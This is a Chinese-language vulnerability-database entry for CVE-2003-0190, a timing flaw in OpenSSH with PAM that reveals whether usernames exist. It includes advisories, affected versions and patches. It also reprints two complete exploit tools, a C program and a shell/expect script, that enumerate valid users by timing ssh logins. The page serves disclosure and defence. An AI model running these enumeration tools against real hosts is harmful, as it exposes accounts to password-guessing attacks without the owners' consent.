CVE-2003-0190
CVSS5.0
发布时间 :2003-05-12 00:00:00
修订时间 :2016-10-17 22:30:27
NMCOES    

[原文]OpenSSH-portable (OpenSSH) 3.6.1p1 and earlier with PAM support enabled immediately sends an error message when a user does not exist, which allows remote attackers to determine valid usernames via a timing attack.


[CNNVD]OpenSSH PAM启用验证延迟信息泄露漏洞(CNNVD-200305-021)

        
        OpenSSH是一种开放源码的SSH协议的实现,目前移植在多种系统下工作。
        移植的OpenSSH版本在支持PAM的情况下存在时序攻击问题,远程攻击者可以利用这个漏洞判断用户是否存在,导致信息泄露。
        根据测试,如果OpenSSH以--with-pam进行配置的情况下,由于对合法用户和非法用户响应信息的时间不同,该可以判断系统用户是否存在。在判断用户情况下,可以进一步通过猜测密码进行攻击。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:openbsd:openssh:3.6.1p1OpenBSD OpenSSH 3.6.1 p1
cpe:/a:openbsd:openssh:3.4p1OpenBSD OpenSSH 3.4 p1

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:445OpenSSH Indirect User Disclosure Vulnerability
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0190
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0190
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200305-021
(官方数据源) CNNVD

- 其它链接及资源

http://lab.mediaservice.net/advisory/2003-01-openssh.txt
(UNKNOWN)  MISC  http://lab.mediaservice.net/advisory/2003-01-openssh.txt
http://lists.grok.org.uk/pipermail/full-disclosure/2003-April/004815.html
(UNKNOWN)  FULLDISC  20030430 OpenSSH/PAM timing attack allows remote users identification
http://marc.info/?l=bugtraq&m=105172058404810&w=2
(UNKNOWN)  BUGTRAQ  20030430 OpenSSH/PAM timing attack allows remote users identification
http://marc.info/?l=bugtraq&m=106018677302607&w=2
(UNKNOWN)  BUGTRAQ  20030806 [OpenPKG-SA-2003.035] OpenPKG Security Advisory (openssh)
http://www.redhat.com/support/errata/RHSA-2003-222.html
(UNKNOWN)  REDHAT  RHSA-2003:222
http://www.redhat.com/support/errata/RHSA-2003-224.html
(UNKNOWN)  REDHAT  RHSA-2003:224
http://www.securityfocus.com/bid/7467
(VENDOR_ADVISORY)  BID  7467
http://www.turbolinux.com/security/TLSA-2003-31.txt
(UNKNOWN)  TURBO  TLSA-2003-31

- 漏洞信息

OpenSSH PAM启用验证延迟信息泄露漏洞
中危 设计错误
2003-05-12 00:00:00 2006-03-28 00:00:00
远程  
        
        OpenSSH是一种开放源码的SSH协议的实现,目前移植在多种系统下工作。
        移植的OpenSSH版本在支持PAM的情况下存在时序攻击问题,远程攻击者可以利用这个漏洞判断用户是否存在,导致信息泄露。
        根据测试,如果OpenSSH以--with-pam进行配置的情况下,由于对合法用户和非法用户响应信息的时间不同,该可以判断系统用户是否存在。在判断用户情况下,可以进一步通过猜测密码进行攻击。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 在Pam_unix.so auth配置文件中增加"nodelay"选项。
        * 通过限制使用密钥验证方式,这可以通过在'sshd_config'增加如下选项完成:
        PasswordAuthentication no
        厂商补丁:
        OpenSSH
        -------
        目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
        OpenSSH Upgrade openssh-3.6.1p2.tar.gz
        ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.6.1p2.tar.gz

- 漏洞信息 (25)

OpenSSH/PAM <= 3.6.1p1 Remote Users Discovery Tool (EDBID:25)
linux remote
2003-04-30 Verified
0 Maurizio Agazzini
N/A [点击下载]
/*
* SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool
* Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved
*
*
* Vulnerability discovered by Marco Ivaldi <raptor@mediaservice.net>
* Proof of concept code by Maurizio Agazzini <inode@mediaservice.net>
*
* Tested against Red Hat, Mandrake, and Debian GNU/Linux.
*
* Reference: http://lab.mediaservice.net/advisory/2003-01-openssh.txt
*
* $ tar xvfz openssh-3.6.1p1.tar.gz
* $ patch -p0 <openssh-3.6.1p1_brute.diff 
* patching file openssh-3.6.1p1/ssh.c
* patching file openssh-3.6.1p1/sshconnect.c
* patching file openssh-3.6.1p1/sshconnect1.c
* patching file openssh-3.6.1p1/sshconnect2.c
* $ cd openssh-3.6.1p1
* $ ./configure
* $ make
* $ cc ../ssh_brute.c -o ssh_brute
* $ ./ssh_brute 1 list.txt 192.168.0.66
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/wait.h>

/* an illegal user */
#define NO_USER "not_val_user"

/* path of the patched ssh */
#define PATH_SSH "./ssh"

/* max time range for invalid user */
#define TIME_RANGE 3 

int main(int argc, char *argv[])
{
FILE * in;
char buffer[2000], username[100], *host;
int time_non_valid = 0, time_user = 0; 
int version = 1, i = 0, ret;

fprintf(stderr, "\n SSH_BRUTE - OpenSSH/PAM <= 3.6.1p1 remote users discovery tool\n");
fprintf(stderr, " Copyright (c) 2003 @ Mediaservice.net Srl. All rights reserved\n"); 

if (argc < 3) {
fprintf(stderr, "\n Usage: %s <protocol version> <user file> <host>\n\n", argv[0]);
exit(-1);
}

version = atoi(argv[1]);
host = argv[3];

if ( ( in = fopen(argv[2], "r") ) == NULL ) {
fprintf(stderr, "\n Can't open %s\n", argv[2]);
exit(-1);
}

/* test an illegal user */
printf("\n Testing an illegal user\t: ");
fflush(stdout);

sprintf(buffer, "%s -%d %s@%s", PATH_SSH, version, NO_USER, host);

for (i = 0; i < 3; i++) {
ret = system(buffer);
time_non_valid += WEXITSTATUS(ret);
}

time_non_valid /= 3;

printf("%d second(s)\n\n", time_non_valid);

time_non_valid += TIME_RANGE;

/* test supplied users */
fscanf(in, "%s", username);

while ( !feof(in) ) {

printf(" Testing login %s\t", username);

if (strlen(username) <= 8)
printf("\t");
printf(": ");

fflush( stdout );

sprintf(buffer, "%s -%d %s@%s", PATH_SSH, version, username, host);
ret = system(buffer);
time_user = WEXITSTATUS(ret);

if (time_user <= time_non_valid) 
printf("\E[31m\E[1mILLEGAL\E[m\t[%d second(s)]\n", time_user);
else {
/* valid user? test it again to be sure */

ret = system(buffer);
time_user = WEXITSTATUS(ret);

if (time_user <= time_non_valid)
printf("\E[31m\E[1mILLEGAL\E[m\t[%d second(s)] [2 test]\n", time_user);
else
printf("\E[32m\E[1mUSER OK\E[m\t[%d second(s)]\n", time_user);
}

fscanf(in, "%s", username);
}

fclose(in);

printf("\n");

exit(0);
}



// milw0rm.com [2003-04-30]
		

- 漏洞信息 (26)

OpenSSH/PAM <= 3.6.1p1 Remote Users Ident (gossh.sh) (EDBID:26)
linux remote
2003-05-02 Verified
0 Nicolas Couture
N/A [点击下载]
#!/bin/sh
# OpenSSH <= 3.6.p1 - User Identification.
# Nicolas Couture - nc@stormvault.net
#
# Description:
#	-Tells you wether or not a user exist on
#	  a distant server running OpenSSH.
# 
# Usage:
#	-You NEED to have the host's public key
#	  before executing this script. 
#

#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#
# Fact Sheet:					 #
#	  o It is really accurate against	 #
#	    redhat boxes.			 #
# 	  o Linux boxes running grsecurity	 #
#	    has 10 seconds delay on both	 #
#	    valid AND invalid user login	 #
#	    attempts.				 #
#	  o *BSD boxes are not vulnerables and	 #
#	     always has 10 seconds delay like  	 #
#	     Linux-Grsec + network protection    #
#						 #
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-#

#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
# History:				 
#	 Thu May  1 15:41:18 EDT 2003  
#	  ; Script started.		
#	 Thu May  1 16:42:30 EDT 2003	
#	  ; Script is functional.	             
#=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#

# Let the user know how we work.
usage(){
 echo "$0 <user> <host>"
 exit 1
}

# Verify the arguments.
[ $# != 2 ] && usage

# Variables.
USER="$1"
HOST="$2"

#=-=-=-=-=-=-=-=-=-=-=-=-=#
# Expect script functions         #
#=-=-=-=-=-=-=-=-=-=-=-=-=#

# Expect script for password.
expasswd() {
cat << EOF > expasswd 
spawn $SSHCMD
expect password:
send '\r'
interact
EOF
}

# Expect script for error.
experror() {
cat << EOF > experror
spawn expect -f expasswd
expect again.
exit 1593
interact
EOF
}

#=-=-=-=-=-=-=-=-=-=#
# -Fake user timing      #
#=-=-=-=-=-=-=-=-=-=#

# OpenSSH client command for inexisting user.
export SSHCMD="ssh nicolas_couture@$HOST"

# Build new expect script.
expasswd
experror

# Timing.
FDATE0=`date '+%s'`
echo "[-] Calculating fake user timeout..."
expect -f experror 1> /dev/null 2> /dev/null
FDATE1=`date '+%s'`

# Fake user timeout.
FUTO=`echo $FDATE1 - $FDATE0 | bc`
echo "[+] Found $FUTO."

#=-=-=-=-=-=-=-=#
# -$USER timing    #
#=-=-=-=-=-=-=-=#

# OpenSSH command.
export SSHCMD="ssh $USER@$HOST"

# Build new expect scripts.
expasswd
experror

DATE0=`date '+%s'`
echo "[-] Calculating $USER timeout on $SERVER..."
expect -f experror 1> /dev/null 2> /dev/null
DATE1=`date '+%s'`

# $USER timeout.
END=`echo $DATE1 - $DATE0 | bc`
echo "[+] Found $END."

#=-=-=-=-=#
# -Result    #
#=-=-=-=-=#

if [ "$FUTO" -eq "$END" ] && [ "$FUTO" -eq "10" ]; then
 echo "This box is not vulnerable."
 exit 1
fi

# Use of our magic skills.
if [ "$FUTO" -lt "$END" ]; then
 echo "$USER exist on $HOST."
elif [ "$FUTO" -ge "$END" ]; then
 echo "$USER doesn't exist on $HOST."
else
 echo "Segmentation fault."
 exit 13
fi

# Remove tmp files.
rm -rf expasswd experror

# EOF

# milw0rm.com [2003-05-02]
		

- 漏洞信息

2140
OpenSSH w/ PAM Username Validity Timing Attack
Local Access Required, Remote / Network Access Information Disclosure, Input Manipulation
Loss of Confidentiality
Exploit Public Vendor Verified

- 漏洞描述

OpenSSH portable contains a flaw that may lead to an unauthorized information disclosure. The issue is triggered when PAM is enabled; remote users can determine which usernames are valid by looking at the relative time it takes to receive an error response from the system. When PAM is enabled, OpenSSH returns an error almost immediately if a user does not exist, and is slower if the user exists but the password is incorrect. This disparity in timing will disclose when the attacker hits upon a valid username, making brute-force username/password guessing easier and resulting in a loss of confidentiality.

- 时间线

2003-04-30 Unknow
2003-04-30 Unknow

- 解决方案

Upgrade to version 3.6.1p2 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by applying the vendor-supplied patch, or by disabling PAM support.

- 相关参考

- 漏洞作者

- 漏洞信息

OpenSSH-portable PAM Authentication Remote Information Disclosure Vulnerability
Design Error 11781
Yes No
2004-11-30 12:00:00 2007-05-08 11:09:00
The original discovery of this vulnerability is credited to 'Marco Ivaldi <raptor@mediaservice.net>'.

- 受影响的程序版本

S.u.S.E. Linux Personal 9.2 x86_64
S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Enterprise Server 9
OpenSSH OpenSSH 3.9 p1
+ S.u.S.E. Linux Personal 9.2 x86_64
+ S.u.S.E. Linux Personal 9.2
OpenSSH OpenSSH 3.8.1 p1
+ Ubuntu Ubuntu Linux 4.1 ppc
+ Ubuntu Ubuntu Linux 4.1 ia64
+ Ubuntu Ubuntu Linux 4.1 ia32
OpenSSH OpenSSH 3.8 p1
+ S.u.S.E. Linux Personal 9.1 x86_64
+ S.u.S.E. Linux Personal 9.1
OpenSSH OpenSSH 3.7.1 p1
+ SCO Open Server 5.0.7
OpenSSH OpenSSH 3.7.1
OpenSSH OpenSSH 3.7 p1
OpenSSH OpenSSH 3.7 .1p2
OpenSSH OpenSSH 3.7
OpenSSH OpenSSH 3.6.1 p2
+ MandrakeSoft Corporate Server 2.1 x86_64
+ MandrakeSoft Corporate Server 2.1
+ MandrakeSoft Multi Network Firewall 2.0
+ Mandriva Linux Mandrake 9.1 ppc
+ Mandriva Linux Mandrake 9.1
+ Mandriva Linux Mandrake 9.0
+ Mandriva Linux Mandrake 8.2 ppc
+ Mandriva Linux Mandrake 8.2
+ Trustix Secure Linux 2.0
OpenSSH OpenSSH 3.6.1 p1
+ OpenPKG OpenPKG Current
+ Slackware Linux 9.0
+ Slackware Linux -current
OpenSSH OpenSSH 3.6.1
+ Novell Netware 6.5
OpenSSH OpenSSH 3.5 p1
+ Conectiva Linux 9.0
+ OpenPKG OpenPKG 1.2
+ RedHat Linux 9.0 i386
+ S.u.S.E. Linux Personal 8.2
+ Terra Soft Solutions Yellow Dog Linux 3.0
OpenSSH OpenSSH 3.5
OpenSSH OpenSSH 3.4 p1-1
OpenSSH OpenSSH 3.4 p1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
+ Conectiva Linux Enterprise Edition 1.0
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha
+ FreeBSD FreeBSD 5.0
+ FreeBSD FreeBSD 4.7 -RELEASE
+ FreeBSD FreeBSD 4.7
+ IBM AIX 5.1 L
+ IBM AIX 4.3.3
+ Immunix Immunix OS 7+
+ RedHat Linux 8.0
+ S.u.S.E. Linux 8.1
+ S.u.S.E. Linux 8.0
+ Slackware Linux 8.1
OpenSSH OpenSSH 3.4
OpenSSH OpenSSH 3.3 p1
+ Conectiva Linux 8.0
+ Conectiva Linux 7.0
+ Conectiva Linux 6.0
OpenSSH OpenSSH 3.3
+ Openwall Openwall GNU/*/Linux (Owl)-current
OpenSSH OpenSSH 3.2.3 p1
OpenSSH OpenSSH 3.2.2 p1
+ Apple Mac OS X 10.1.5
+ Apple Mac OS X 10.1.4
+ Apple Mac OS X 10.1.3
+ Apple Mac OS X 10.1.2
+ Apple Mac OS X 10.1.1
+ Apple Mac OS X 10.1
+ Apple Mac OS X 10.1
+ Apple Mac OS X 10.0.4
+ Apple Mac OS X 10.0.3
+ Apple Mac OS X 10.0.2
+ Apple Mac OS X 10.0.1
+ Apple Mac OS X 10.0
OpenSSH OpenSSH 3.2
+ OpenBSD OpenBSD 3.1
OpenSSH OpenSSH 3.1 p1
+ Juniper Networks NetScreen-IDP 10 3.0 r2
+ Juniper Networks NetScreen-IDP 10 3.0 r1
+ Juniper Networks NetScreen-IDP 10 3.0
+ Juniper Networks NetScreen-IDP 100 3.0 r2
+ Juniper Networks NetScreen-IDP 100 3.0 r1
+ Juniper Networks NetScreen-IDP 100 3.0
+ Juniper Networks NetScreen-IDP 1000 3.0 r2
+ Juniper Networks NetScreen-IDP 1000 3.0 r1
+ Juniper Networks NetScreen-IDP 1000 3.0
+ Juniper Networks NetScreen-IDP 500 3.0 r2
+ Juniper Networks NetScreen-IDP 500 3.0 r1
+ Juniper Networks NetScreen-IDP 500 3.0
+ Red Hat Enterprise Linux AS 2.1 IA64
+ Red Hat Enterprise Linux AS 2.1
+ RedHat Enterprise Linux ES 2.1 IA64
+ RedHat Enterprise Linux ES 2.1
+ RedHat Enterprise Linux WS 2.1 IA64
+ RedHat Enterprise Linux WS 2.1
+ RedHat Linux 7.3
+ RedHat Linux 7.2
+ RedHat Linux 7.1
+ RedHat Linux for iSeries 7.1
+ RedHat Linux for pSeries 7.1
+ Slackware Linux 8.1
+ Sun Linux 5.0.7
+ Sun Solaris 9
+ Trustix Secure Linux 1.5
+ Trustix Secure Linux 1.2
+ Trustix Secure Linux 1.1
OpenSSH OpenSSH 3.1
OpenSSH OpenSSH 3.0.2 p1
+ Guardian Digital Engarde Secure Linux 1.0.1
+ HP VirtualVault 4.6
OpenSSH OpenSSH 3.0.2
- Debian Linux 3.0
+ FreeBSD FreeBSD 4.5 -STABLEpre2002-03-07
+ FreeBSD FreeBSD 4.5 -RELEASE
+ OpenPKG OpenPKG 1.0
+ Openwall Openwall GNU/*/Linux 0.1 -stable
+ S.u.S.E. Linux 8.0
OpenSSH OpenSSH 3.0.1 p1
OpenSSH OpenSSH 3.0.1
OpenSSH OpenSSH 3.0 p1
OpenSSH OpenSSH 3.0

- 漏洞讨论

The portable version of OpenSSH is reported prone to an information-disclosure vulnerability. The portable version is distributed for operating systems other than its native OpenBSD platform.

This issue is related to BID 7467. Reportedly, the previous fix for BID 7467 didn't completely fix the issue. This current issue may involve differing code paths in PAM, resulting in a new vulnerability, but this has not been confirmed.

Exploiting this vulnerability allows remote attackers to test for the presence of valid usernames. Knowledge of usernames may aid them in further attacks.

- 漏洞利用

The following proof-of-concept exploit is available:

- 解决方案

Please see the references for more information and fixes.


OpenSSH OpenSSH 3.4 p1

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站